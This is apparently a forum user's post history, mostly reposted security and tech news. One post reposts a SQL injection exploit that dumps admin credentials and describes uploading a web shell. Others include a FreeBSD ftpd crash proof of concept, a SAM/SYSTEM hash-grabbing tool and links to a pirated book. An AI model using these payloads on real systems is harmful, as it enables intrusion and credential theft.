-
Posts
3972 -
Joined
-
Last visited
-
Days Won
22
Everything posted by begood
-
You can see a list of the largest 1000 sites worldwide, based on Unique Visitors (users), as measured by Ad Planner. This list is updated monthly as new Ad Planner datasets are released. The list defines sites as top-level domains. For each site on the list, you'll be able to see: The site category Unique Visitors (users) Page Views Whether the site has ads Keep in mind that the list excludes adult sites, ad networks, domains that don't have publicly visible content or don't load properly, and certain Google sites. Top 1000 sites - DoubleClick Ad Planner
-
Okay so, after our old post regarding the list of Cell Phone Forensic tools!, we thought of following it up with a list of free and open source SIM card forensics tools. Without much ado, we present you a list of SIM card forensics tools: SIMBrush: SIMbrush is a new open-source tool which can be used to extract all observable memory (the ones that can be explored by means of standard APIs) from SIM/USIM cards compatible with T_0 protocol. This program is capable of acquiring standard and non-standard files present into every SIM card. The operation of dumping the whole set of elementary files is time consuming and the extraction time is proportional to the number of dedicated files (DFs) present in the file system. The output of program is an XML file representing the SIM/USIM card file system, which can be also referred to as the primary copy. At the moment the tool functions on the Linux platform, but it is possible recompile it on the Windows one. Download SIMBrush beta here. pySIM: It is also called as PySIMReader. pySIM is SIM card management tool, capable of creating, editing, deleting, backup and restore operations on your SIM Phonebook and SMS records. It is also open source which works on Windows 98 and later. Download pySIM version 14 here. SIMQuery: SIMQuery is a tool that retrieves the ICCID and IMSI from a GSM SIM card. This is a simple command line based tool, which requires that you have ID-1 to Plug-in adapter card. It is compatible on Windows 95 and upwards! It is not open source. Download SIMQuery here. UndeleteSMS: UndeleteSMS can recover deleted SMS messages from a GSM SIM card. This tool also, is compatible Windows 95 and upwards. Download UndeleteSMS here. These are the only open source and free tools that we could find. Basically, in a SIM card forensics, you need to acquire SIM Card and analyze the following: ICCID – Integrated Circuit Card Identification MSISDN – Subscriber phone number IMSI – International Mobile Subscriber Identity LND – Last Dialed numbers LOCI – Location Information LAI – Location Area Identifier ADN – Abbreviated Dialing Numbers (Contacts) FDN – Fixed Dialing Numbers (Provider entered Numbers) SMS – (Short Messages) SMSP – Text Message parameters SMSS – Text message status Phase – Phase ID SST – SIM Service table LP – Preferred languages variable SPN – Service Provider name EXT1 – Dialing Extension EXT2 – Dialing Extension GID1 – Groups GID2 – Groups CBMI – Preferred network messages PUCT – Calls per unit ACM – Accumulated Call Meter ACMmax – Call Limit HPLMNSP – HPLMN search period PLMNsel – PLMN selector FPLMN – Forbidden PLMNs CCP – Capability configuration parameter ACC – Access control class BCCH – Broadcast control channels Kc – Ciphering Key List of Free SIM Card Forensic Tools! ? PenTestIT
-
This, dear friends, is the height of comedy. Opera's pair of Scandinavian browser testers are back, this time applying some extremely high-tech speed tests to determine whether the Norwegian browser is faster than boiling a potato. Seriously, if you're not laughing at this, you either work for Google or you have a funny bone missing. In more concrete news, the acceptance of Opera Mini to the iPhone has accounted for a cool 70 percent of the Mini's growth over the month of April, with 2.6 million Apple users downloading the software worldwide. But that's not what you're here for, you're here to see the epic video, which awaits after the break along with Google's original. [Thanks, Ian G.] Opera parodies Google's Chrome speed tests mercilessly (video) -- Engadget
-
Description The Sleuth Kit (previously known as TASK) is a collection of UNIX-based command line file and volume system forensic analysis tools. The file system tools allow you to examine file systems of a suspect computer in a non-intrusive fashion. Because the tools do not rely on the operating system to process the file systems, deleted and hidden content is shown. The volume system (media management) tools allow you to examine the layout of disks and other media. The Sleuth Kit supports DOS partitions, BSD partitions (disk labels), Mac partitions, Sun slices (Volume Table of Contents), and GPT disks. With these tools, you can identify where partitions are located and extract them so that they can be analyzed with file system analysis tools. When performing a complete analysis of a system, we all know that command line tools can become tedious. The Autopsy Forensic Browser is a graphical interface to the tools in The Sleuth Kit, which allows you to more easily conduct an investigation. Autopsy provides case management, image integrity, keyword searching, and other automated operations. Input Data Analyzes raw (i.e. dd), Expert Witness (i.e. EnCase) and AFF file system and disk images. (Sleuth Kit Informer #11) Supports the NTFS, FAT, UFS 1, UFS 2, EXT2FS, EXT3FS, and ISO 9660 file systems (even when the host operating system does not or has a different endian ordering). Tools can be run on a live UNIX system during Incident Response. These tools will show files that have been "hidden" by rootkits and will not modify the A-Time of files that are viewed. (Sleuth Kit Informer #13) Search Techniques List allocated and deleted ASCII and Unicode file names. (Sleuth Kit Informer #14 (FAT Recovery), #16 (NTFS Orphan Files)) Display the details and contents of all NTFS attributes (including all Alternate Data Streams). Display file system and meta-data structure details. Create time lines of file activity, which can be imported into a spread sheet to create graphs and reports. (Sleuth Kit Informer #5) Lookup file hashes in a hash database, such as the NIST NSRL, Hash Keeper, and custom databases that have been created with the 'md5sum' tool. (Sleuth Kit Informer #6, Sleuth Kit Informer #7) Organize files based on their type (for example all executables, jpegs, and documents are separated). Pages of thumbnails can be made of graphic images for quick analysis. (Sleuth Kit Informer #3, #4, #5) The Sleuth Kit is written in C and Perl and uses some code and design from The Coroner's Toolkit (TCT). The Sleuth Kit has been tested on: Linux Mac OS X Windows (Visual Studio and mingw) CYGWIN Open & FreeBSD Solaris The Sleuth Kit: Description
-
cam asa. + topicuri de cacat.
-
Maybe moving $300 fans is harder than Dyson expected, or perhaps Dyson's engineers are just flat out of things to do. Either way, this Rube Goldberg-ian balloon course, made from God knows how many Air Multiplier bladeless fans, is mesmerizing. Dyson's official explanation: And so we've found a lasting use for the Air Multiplier: As an interactive exhibit in a science museum. Throw in a smoke machine next time. [Techland] merita vizionat
-
Turns out the most common defense against clickjacking and other Web framing attacks is easily broken: Researchers were able to bypass frame-busting methods used by all of the Alexa Top 500 websites. The new research from Stanford University and Carnegie Mellon University's Silicon Valley campus found that frame-busting, a popular technique that basically stops a website from operating when it's loaded inside a "frame," does not prevent clickjacking. Clickjacking attacks use malicious iFrames inserted into a Web page to hijack a user's Web session. "There are so many different ways to do frame-busting, and that's a problem with it," says Collin Jackson, one of the lead researchers in the project and assistant research professor at CMU-Silicon Valley. "All it's doing is saying it detects an iFrame, refuses the function, and moves the user to a site where it will function again. Our big observation [in the research] is that it's not sufficient to just move a user into a functional [area]." Jackson says he had suspected that frame-busting was weak since it was mainly an "ad-hoc" solution. "But we didn't know the magnitude of the problem," he says. "We had trouble finding any sites that were secure against all the attacks we identified." Gustav Rydstedt, one of the Stanford researchers, says the toughest frame-busting method of all was Twitter's, which had some back-up checks in case its frame-busting defense were to fail. In an ironic twist, the researchers used a security feature in Internet Explorer and Google Chrome browsers to demonstrate clickjacking attacks against the websites' frame-busting methods, including Twitter's. The cross-site scripting (XSS) filter in the browsers basically tricked the browser into seeing frame-busting as an XSS attack: "You tack it onto the URL ... and the browser says it looks like a URL appearing in a Web page and attempts to block it, so it blocks the frame-busting script from executing," Jackson says. The frame-busting research on real website defenses further illuminates security industry concerns that today's clickjacking defenses are weak. "Much of the security industry has been of the mind that current clickjacking defenses are easily defeated, so that didn't come as much of a surprise. What I found great about this research was the authors' survey of the strategies sites are currently trying to use in the wild," says Jason Li, principal consultant with Aspect Security. CMU's Jackson and fellow researchers Rydstedt, Elie Bursztein, and Dan Boneh -- all from Stanford -- say the best defense against clickjacking and related attacks is a JavaScript-based defense using frame-busting JavaScript code they wrote and included in their report, or the NoScript browser plug-in. The best long-term solution, they say, is to adopt the new X-Frame-Options found in Microsoft's IE 8 and in the latest versions of most browsers. X-Frame-Options, a special HTTP header, was created by Microsoft to stop clickjacking attacks. "The website has to opt in to using the X Frame Options," Jackson says. "Unfortunately, a very small number of websites in our study were using it. But that's not surprising since it's so new." Other Web application security experts agree that the X-Frames-Options header, once it's adopted by other browsers, will provide better security than frame-busting. "If you're running a site that doesn't need to be framed by external partners and you can force your users to a specific version of a browser, the X-Frame-Options header is probably the least intrusive, most effective solution. But that scenario probably applies to a very small set of sites, such as internal intranet apps where companies can control the version of browsers deployed on their desktops," Aspect Security's Li says. Andre Gironda, an application security analyst for a large gaming company, says in the application assessments he conducts he typically recommends X-Frame-Options in the HTTP header for preventing clickjacking. Gironda says while there have been no major clickjacking attacks publicized to date, he considers it a potential bombshell. "It can do anything a user can do once it's used as an insertion point into an app," he says. For sites that need to allow other sites to frame their pages, clickjacking lockdown is a bit trickier because it entails working with the partner sites, according to Aspect Security's Li. And Li says the Stanford and CMU researchers' recommendation for anti-clickjacking is on target, though there's no guarantee future browser implementations won't derail it. "There's no telling if a slight variation in the behavior of one's browser's future implementation could result in a means to circumvent their solution," he says. Meanwhile, clickjacking isn't the Web developer's biggest worry today, either, CMU's Jackson notes. "Cross-site scripting is going to be the largest and most popular [vulnerability] for quite some time. It's incredibly hard to write [an app] without an XSS," he says. "I wouldn't say clickjacking is the end of the Web as we know it ... It's something every Web developer has to know about [and prevent]." Jackson says the best bet would be for Web application frameworks to provide the default security for defending against things like clickjacking. "I'm pushing for Web app frameworks to take a lot of these security problems out of the hands of developers," he says. http://www.darkreading.com/security/vulnerabilities/showArticle.jhtml?articleID=225200337
-
Why are scientists getting pond snails hooked on meth? To figure out how addiction works. But they discovered something else: Meth enhances memory. What you learn when high stays with you longer and more clearly than what you learn sober. Lymnaea stagnalis — better known as pond snails — are widely used to study learning and memory due to the fact they only have around 20,000 neurons, many of which are individually identifiable. Amphetamines affect memory, making the drug especially difficult to leave behind. By using an organism with a well-understood brain, scientists thought they might be able to better understand the effect crystal meth has on the memory and the mind. So how do you see what happens with the memory of a snail? Lymnaea stagnalis has a very defined limit to learning — if you give it two training sessions separated by an hour, it'll retain the lesson for 24 hours. To train the molluscs, researchers placed them in de-oxygenated water with methamphetamine added, and poked the snails whenever they tried to reach their breathing tubes above the water to boost their oxygen intake. This negative reinforcement taught them not to stick their pneumostomes, or snail noses, above water. Not only did the pond snails trained in meth water remember their task far longer than those trained in normal water, but once they were in a non-methamphetamine environment, if the drug was added to the liquid again, they would suddenly recall their training. Attempts to retrain them without drugs proved to be difficult, as memories formed while on the drug were far more resilient than those off of it. What does this mean for humans? Memories formed while high on methamphetamine are particularly intense. Couple the intense rush and euphoria the drug provides with an inability to forget how it felt, and you can see how this would make quitting even harder. Revisiting the places of addiction is also thought to trigger these memories, which is why many recovering addicts are advised to avoid their old haunts. It's still not clear why methamphetamine memories are so resilient, but one possible reason is that the drug may disrupt the mechanism that allows us to forget. Read the full paper, published in The Journal of Experimental Biology
-
Not long after I launched this blog, I wrote about the damage wrought by the Eleonore Exploit Kit, an increasingly prevalent commercial hacking tool that makes it easy for criminals to booby-trap Web sites with malicious software. That post generated tremendous public interest because it offered a peek at the statistics page that normally only the criminals operating these kits get to see. I’m revisiting this topic again because I managed to have a look at another live Eleonore exploit pack panel, and the data seem to reinforce a previous observation: Today’s attackers care less about the browser you use and more about whether your third-party browser add-ons and plugins are out-of-date and exploitable. Hacked and malicious sites retrofitted with kits like Eleonore have become more common of late: In a report issued this week, Web security firm Zscaler found that roughly 5 percent of the browser exploits they identified during the first quarter of this year were tied to hacked or malicious sites that criminals had outfitted with some version of Eleonore. Like most exploit kits, Eleonore is designed to invisibly probe the visitor’s browser for known security vulnerabilities, and then use the first one found as a vehicle to silently install malicious software. The hacker’s end of the kit is a Web-based interface that features detailed stats on the percentage of visitors to the booby-trapped site(s) that are successfully attacked, and which software vulnerabilities were most successful in leading to the installation of the hacker’s malware. This particular Eleonore kit — which is currently stitched into several live adult Web sites — comes with at least a half-dozen browser exploits, including three that target Internet Explorer flaws, two that attack Java bugs, and one that targets a range of Adobe PDF Reader vulnerabilities. According to this kit’s stats page, the malicious adult sites manage to infect roughly every one in ten visitors. As we can see from the landing page pictured above, Windows XP users represent by far the largest group of users hitting these poisoned porn sites. Once again, Eleonore shows just how heavily Java flaws are now being used to infect computers (the above graphic shows the number of successful malware installations or “loads” per exploit). The last time I reviewed a working Eleonore admin panel, we saw that Java flaws were the second most reliable exploits. This time around, Java was the biggest source infections. In the Eleonore kit I wrote about earlier this year, some 34 percent of the systems that were successfully exploited were attacked via a Java flaw. In this installation, four out of every ten victims who were hacked were compromised because of they were running an outdated version of Java. Nearly one-third of all successful attacks from this Eleonore kit leveraged flaws in older versions of Adobe’s PDF Reader. People often scoff when I recommend an alternative to Adobe for displaying PDFs, saying that criminals can just as easily target security vulnerabilities in those applications, which ship far fewer security updates than Adobe. That may be true, but I haven’t seen much evidence that hackers are going after flaws in non-Adobe PDF readers at any appreciable or comparable level. Incidentally, if you use the free PDF reader from Foxit, an Adobe alternative I’ve often recommended, you should know that Foxit recently shipped a new version — v. 3.31 — that includes security improvements. I also found this time around similar percentages of exploit victims among those surfing with different versions of Internet Explorer. With this Eleonore kit, more than one-third of those who visited the exploit site with IE6 were loaded with malicious software. The Eleonore admin panel reported that more than 12 percent of IE7 users and 20 percent of IE8 surfers visited and subsequently were infected with malware. The prevalence of IE users among the victims may be due in part to the fact that half of the exploits used by this particular kit target IE security holes. Annoyingly, this Eleonore admin page doesn’t resolve one of the open questions I heard most frequently after my last story on Eleonore: Where are all the Firefox victims? I still don’t have a decent answer to that puzzle, but I do have a couple of guesses. For one thing, unlike the last Eleonore kit I examined, this one does not include an exploit specifically for Firefox. It’s also possible that these kits are detecting Firefox visitors as users of some other browser (the report indicates, for example, that 15 percent of Google Chrome users browsing with version 4.1 were successfully attacked). Whatever the reason, it seems highly unlikely that all of the nearly 5,600 Firefox users who visited the exploit sites detailed here escaped unscathed. Anyway, below are the stats, which start with those of Chrome and Firefox visitors: …more Firefox stats and then IE, Opera and Safari… Revisiting the Eleonore Exploit Kit — Krebs on Security
-
Course at a glance 1600 interactive elearning slides 3 Knowledge Domains Network security System security Web application security Learn the best methodologies Learn how to write a great report 4 hours of video lessons Dedicated forums Labs Qualifies you for 40 CPE credits eCPPT Certification Penetration testing training course
-
# Title: FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05) # EDB-ID: 12762 # CVE-ID: (CVE-2010-1938) # OSVDB-ID: () # Author: Maksymilian Arciemowicz # Published: 2010-05-27 # Verified: no # Download Exploit Code # Download N/A view source # FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05) # CVE-2010-1938 # FreeBSD-SA-10:05 # Credit: Maksymilian Arciemowicz and Adam Zabrocki # # http://securityreason.com/achievement_securityalert/87 # http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc # http://blog.pi3.com.pl/?p=111 # PoC: Connected to localhost. Escape character is '^]'. 220 127.cx FTP server (Version 6.00LS) ready. user cx 331 Password required for cx. user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Connection closed by foreign host. - -- Best Regards, - ------------------------ pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) <cxib@securityreason.com> sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-
# Title: Script Upload Up Your Shell (Sql Inject) # EDB-ID: 12763 # CVE-ID: () # OSVDB-ID: () # Author: MouDy-Dz # Published: 2010-05-27 # Verified: no # Download Exploit Code # Download N/A view source [URL="http://www.exploit-db.com/exploits/12763#printSource"][/URL] # ----------------------oOO---(_)---OOo----------------------- # | __ __ | # | _____/ /_____ ______/ /_ __ ______ ______ | # | / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/ | # | (__ ) /_/ /_/ / / / /_/ / /_/ / /_/ (__ ) | # | /____/\__/\__,_/_/ /_.___/\__,_/\__, /____/ | # |MouDy-Dz /____/ 2o1o | # ------------------------------------------------------------ Upload Shell # ------------------------------------------------------------ -------------------------------------------------------------- File Share <== all version (download.php?downID=) arabic Script -------------------------------------------------------------- #[+] Author : MouDy-Dz # # [+] Email : [email]MouDy-Dz@HoTMaiL.coM[/email] # # [+] 27-5-2010 # # [+] Cobra Team # # [+] Script : Upload »File share# # All Version # =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Exploit : scriptFile share\download.php?downID= [url]http://localhost/scriptFile[/url] share\download.php?downID=[Sql Inject] [url]http://127.0.0.1/scriptFile[/url] share\download.php?downID=[Sql Inject] [Sql Inject] = -4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre Exemple = [url]http://localhost/scriptFile[/url] share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre you can use another Number in (-4) *_^ After [url]http://localhost/scriptFile[/url] share\download.php?downID=-4+union+select+1,concat%28id,0x3a,nom,0x3a,pass%29,3,4,5,6,7,8,9,10+from+mombre You show The Admin and The password Login =====> admincp/login.php exemple = [url]http://localhost/scriptFile[/url] share\admincp/login.php after login add .php and go to home of script and upload your shell web site Favorites my Of Exploit : JusT=====> [url=http://www.exploit-db.com]Offensive Security Training presents - The Exploit Database[/url] ================== Greetz : all my friend =================== * Sn!per-dz * * ???&???? * KONDAMNE * AntiSystem * Antitracker | ? ??? ???? ????? ???? ????? ================== Greetz : My Best Forum =================== * [url]www.3asfh.com[/url] / [url=http://www.Dev-point.com]äÞØÉ ÇáÊØæíÑ - ÇÎÊÑÇÞ æÍãÇíÉ ÇáÔÇÊ[/url] /www.h4ckforu.com /www.sa3eka.com
-
Cum sa interceptezi telefonia mobila in 30 minute
begood replied to balcky's topic in Mobile security
http://rstcenter.com/forum/18939-mobile-phone-security-cracked-engleza.rst http://rstcenter.com/forum/stiri-securitate/18939-mobile-phone-security-cracked-engleza-2.html#post121778 si e 2.5 TiB nu 2TB -
This book is a practical guide to finding and exploiting security flaws in web applications. Highlights include: Comprehensive and deep coverage of all kinds of attacks. Practical focus that spells out the detailed steps involved in detecting and exploiting each kind of vulnerability. Numerous real-world examples, screen shots and code extracts. Advanced techniques including how to disassemble client-side components, automate custom attacks, and find vulnerabilities in source code. A detailed, proven methodology for performing an end-to-end attack. Co-authored by PortSwigger (creator of Burp), this book includes all of the manual techniques that you need to master to compromise today's web applications, and also describes how you can best leverage the available tools to make your attacks faster and more effective. Book details Title: The Web Application Hacker's Handbook: Detecting and Exploiting Security Flaws Authors: Dafydd Stuttard & Marcus Pinto Pages: 768 Published: October 2007, Wiley. ISBN: 0470170778 / 978-0470170779 From the back cover: The Web Application Hacker's Handbook 0470170778.rar Multiupload.com - upload your files to multiple file hosting sites! RapidShare: 1-CLICK Web hosting - Easy Filehosting MEGAUPLOAD - The leading online storage and file delivery service Hotfile.com: One click file hosting: 0470170778.rar zSHARE - 0470170778.rar Download 0470170778.rar for free on uploading.com 2shared - download 0470170778.rar
-
A British scientist says he is the first man in the world to become infected with a computer virus. Dr Mark Gasson from the University of Reading contaminated a computer chip which was then inserted into his hand. The device, which enables him to pass through security doors and activate his mobile phone, is a sophisticated version of ID chips used to tag pets. In trials, Dr Gasson showed that the chip was able to pass on the computer virus to external control systems. If other implanted chips had then connected to the system they too would have been corrupted, he said. Medical alert Dr Gasson admits that the test is a proof of principle but he thinks it has important implications for a future where medical devices such as pacemakers and cochlear implants become more sophisticated, and risk being contaminated by other human implants. "With the benefits of this type of technology come risks. We may improve ourselves in some way but much like the improvements with other technologies, mobile phones for example, they become vulnerable to risks, such as security problems and computer viruses." However, Dr Gasson predicts that wider use will be made of implanted technology. "This type of technology has been commercialised in the United States as a type of medical alert bracelet, so that if you're found unconscious you can be scanned and your medical history brought up." Professor Rafael Capurro of the Steinbeis-Transfer-Institute of Information Ethics in Germany told BBC News that the research was "interesting". "If someone can get online access to your implant, it could be serious," he said. Cosmetic surgery Professor Capurro contributed to a 2005 ethical study for the European Commission that looked at the development of digital implants and possible abuse of them. "From an ethical point of view, the surveillance of implants can be both positive and negative," he said. "Surveillance can be part of medical care, but if someone wants to do harm to you, it could be a problem." In addition, he said, that there should be caution if implants with surveillance capabilities started to be used outside of a medical setting. However, Dr Gasson believes that there will be a demand for these non-essential applications, much as people pay for cosmetic surgery. "If we can find a way of enhancing someone's memory or their IQ then there's a real possibility that people will choose to have this kind of invasive procedure." Dr Gasson works at the University of Reading's School of Systems Engineering and will present the results of his research at the International Symposium for Technology and Society in Australia next month. Professor Capurro will also talk at the event. news and video : BBC News - First human 'infected with computer virus' //a new milestone in human "evolution"
-
Cititi primul post. De acum incolo nu mai faceti astfel de threaduri ca va paste un ban permanent + ip.
-
(PhysOrg.com) -- In 2008, researchers from the University of Arizona created a holographic 3D display that could write and erase images, making it the first updatable (or rewritable) holographic 3D display ever demonstrated. The key to the display was a photorefractive polymer material, which enabled the researchers to take advantage of the potential of holography to a greater extent than previously allowed. Now, in a follow-up study, the researchers have reported the results of their analysis on the performance of the display, including how the polymer enables display enhancements and what more needs to be done before such displays can be widely used. As the researchers explain, there is a big jump between developing static holograms, such as those that appear on credit cards and drivers’ licenses, and updatable holograms. A variety of materials can be used to make full-color, large-size static holograms, but none of these materials are updatable. As the researchers’ previous study showed, photorefractive polymers have the potential to offer colorful images and large sizes in an updatable display. The display they demonstrated was, at 4 in. x 4 in., the largest yet created. It could display new images every 3 minutes, and images could be viewed for several hours without the need for refreshing. With these features, the display could serve as the basis for future displays that could offer a variety of glasses-free 3D applications in medical, industrial, military, and entertainment imaging. “Photorefractive polymers are primarily beneficial because the method for achieving an index of refraction change is reversible and can be very fast, which is necessary for a real-world display,” coauthor Cory Christenson from the University of Arizona told PhysOrg.com. “Some materials currently used to make holograms are permanent and take hours to write. Additionally, the material permits making displays with large sizes (at least 4 in. x 4 in.), and in principle is scalable. Also, a single display device is stable for many months to a year or more before a noticeable drop in performance is observed. Photorefractive polymers are also attractive because modifying them with different polymers is relatively easy. If we want to test the effects of a different or new polymer to see if it helps increase speed or efficiency, it is not a significant challenge to make that composite.” Holograms, like photographs, are recordings of reflected light. Here, the researchers created a hologram based on a 3D model of an object on a computer, and no real physical object was required. They then generated 2D perspectives of the object on the computer, which were processed and combined to create about 120 holographic pixels, or “hogels.” To create a single hogel, the researchers modulated a laser beam with that hogel, focused the beam on a thin vertical line, and made the beam interfere with a second, unmodulated laser beam. The entire hologram could be written by repeating this process with all 120 hogels and positioning them next to each other. After all hogels were written, the researchers could illuminate the sample with a simple LED to make the 3D hologram viewable. The sensation of 3D is created due to parallax: each eye is seeing a different perspective of the object. Ideally, a polymer material should have a combination of a fast write-erase rate (required for video applications) and a high efficiency (required for bright images). Getting a high efficiency means adding traps for the charges generated, but traps also take time and slow down the write-erase rate, resulting in a tradeoff between these two features. In their study, the researchers tested two slightly different copolymers, each of which exceeded in one of the two areas. “In looking at both the standard display material composition and one that was slightly different, we were able to study the effects of adding more sensitizer and traps (in the form of C60) to the material,” Christenson said. “The greatest significance of this is a more in-depth understanding of the physics that leads to the formation of the hologram. This understanding gives us a better idea of its potential for use in new applications and will guide future studies as we attempt to improve the material.” The researchers determined that improvements could be made by mechanisms such as pulsed writing and reflection geometry, with the ultimate goal of creating realistic 3D holographic applications. “The primary area for improvement is the sensitivity of the material,” Christenson said. “The media for permanent holograms is more sensitive to light than these photorefractive polymers, which permit better looking holograms. We are trying to find ways of decreasing the light needed to write a hologram, which will make it much easier to expand into the areas mentioned in the paper, such as white-light viewing and writing at video rates.” Researchers analyze performance of first updatable holographic 3D display
-
plink : PuTTY Download Page http://the.earth.li/~sgtatham/putty/latest/x86/plink.exe Fpipe v2.01 Port Redirector Foundstone Security Tools : Fpipe v2.01 Port Redirector Pivoting into a network using PLINK and FPipe on Vimeo
-
New features have been added in to the Pcap Forensics Tool. -Support for multiple files within a single stream -Support for multiple HTTP Requests within a single stream -HTTP GET correlation with returned data -Improved Gzip decoding -Source and Destination IP Filtering -Pinpoint file extraction The following is an example of the new switches it supports: This is the new summary when given the "-s" switch: Filtering destination IP addresses with HTTP Information: And finally, the pinpoint file extraction. The switch "-E" is used in conjunction with a format "s2f1" (stream 2 file 1) to pinpoint which file the user wants to extract as seen below: The tool can be downloaded at the same location: Pcap Forensics Tool This includes the updated gzip support which was created by the writer of JsUnpack. Pcap Forensics Tool Update | Malware Forge
-
s3my0n submitted this video to us. According to his post - In this video I will demonstrate how to use hashgrab under BackTrack 4 Final. HashGrab automatically mounts any Windows partitions it finds, then it looks for SAM and SYSTEM files in system32's "config" folder, and if found, copies them to user specified directory. Download: http://stashbox.org/857577/hashgrab.zip You can contact him at rush4ck3r [] gmail [] com Automatically steal SAM and SYSTEM Files using HashGrab Tutorial
-
Part 1 Every culture has its beginning somewhere, Computer hacking is no exception. The History of Hacking video series is a 5 part documentary which runs down memory lane and presents important figures, facts and personalities of the Hacking culture. In History of Hacking Part 1, we will look at Phone Phreaking and John Draper a.k.a Captain Crunch and try and understand the string of events which molded the Phone Phreaking culture. Those of you who have not heard of John, he is the guy who figured out that the whistle in the Captain Crunch serials box, had the same tone as AT&T's long distance calling telephony systems. Thus using this whistle it was possible for Phone Phreakers to make long distance calls for free. History of Hacking Part 1 Tutorial Part 2 In History of Hacking Part 2, we see that by now the Phone Phreaking has become widespread and due to the easy availability of Blue Boxes, more and more people are resorting to making free phone calls. Of course, AT&T discovered the glitch and set the cops behind Phone Phreakers. Blue Boxes became banned items and possession of one, constituted a crime. During this time Steve Wozniak and Steve Jobs met up with John Draper, learnt the art of Phone Phreaking and started selling Blue Boxes. This was Apple's humble beginning ;-) History of Hacking Part 2 Tutorial Part 3 History of Hacking Part 3, is about the dawn of personal computers and the revolution created by Apple. In this video we will see how Steve Jobs and Steve Wozniak, start making personal computers and selling them. Unbelievably the whole project had been started by Wozniak as a hobby and to display in the local Home Brew club. This video is a must watch for anyone who wants to know how the personal computer revolution started. History of Hacking Part 3 Tutorial Part 4 History of Hacking Part 4 is all about the infamous hacker Kevin Mitnick. In fact Kevin was the first hacker to make it to the FBI Most wanted list and even has a movie called Operation Takedown made about him. This video talks all about Kevin and how the FBI finally caught up, with the help of computer security expert Tsutomu Shimomura. This is definitely an interesting part of Hacking history and if possible please watch the movie as well, it's an absolute masterpiece. History of Hacking Part 4 Tutorial Part 5 History of Hacking Part 5 continues with the Kevin Mitnick chase and finally the FBI nab him. As he was the first cyber criminal to be nabbed the judiciary system wanted to make an example out of him. He was held in prison for over 2 years before being released. During this time the whole "Free Kevin" movement started over the Internet. Kevin Mitnick is now a reformed hacker and has started his own successful security consulting services. The video comes to an end with Steve Mozniak, John Draper and Kevin, all meeting up together and discussing old times. Well, that also brings us to the end of this 5 part series on the History of Hacking. Hope you enjoyed the show! History of Hacking Part 5 Tutorial
-
gusturile din cate vad eu mai sus se discuta
-
Ultimate Edition Gamers? What is Ultimate Edition Gamers? Ultimate Edition Gamers has been around for some time, however is the first time a page has been written for it. Our latest release 2.6 was built by Bnjamin_Breeg, he intends to make a PS/3 Ultimate Edition. Ultimate Edition Gamers is based as per release ie 2.6 gamers is built off Ultimate Edition 2.6 with all updates pre-installed and a few games also pre-installed for your convenience. Using Ultimate Edition 2.6 Gamers as an example: Urban Terror & extra maps Aisleriot Solitaire Atomic Tanks Battle for Wesnoth Boswars Chromium B.S.U. Gbrainy Glest Gridwars Mahjongg Mines Neverball Play on Linux Quadrapassel Scorched 3D Suduko Warzone 2100 A special Thanks goes out to Bnjamin_Breeg. and a google search : http://www.google.ro/#hl=ro&source=hp&q=linux+3d+games&aq=f&aqi=g2&aql=&oq=&gs_rfai=&fp=41186e3d4437cebf
-
Pentoo is a security-focused livecd based on Gentoo It's basically a gentoo install with lots of customized tools, customized kernel, and much more. Here is a non-exhaustive list of the features currently included : Kernel 2.6.31.6 with lzma and aufs patches Wifi stack 2.6.32_rc7 Module loading support ala slax Changes saving on usb stick Enlightenment DR17 WM Cuda/OPENCL cracking support with development tools System updates if you got it finally installed Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo. We have a pentoo meta ebuild in progress, which will install all the pentoo tools based on USE flags. Pentoo Pentoo (Wireless Hacking Distro) Tutorial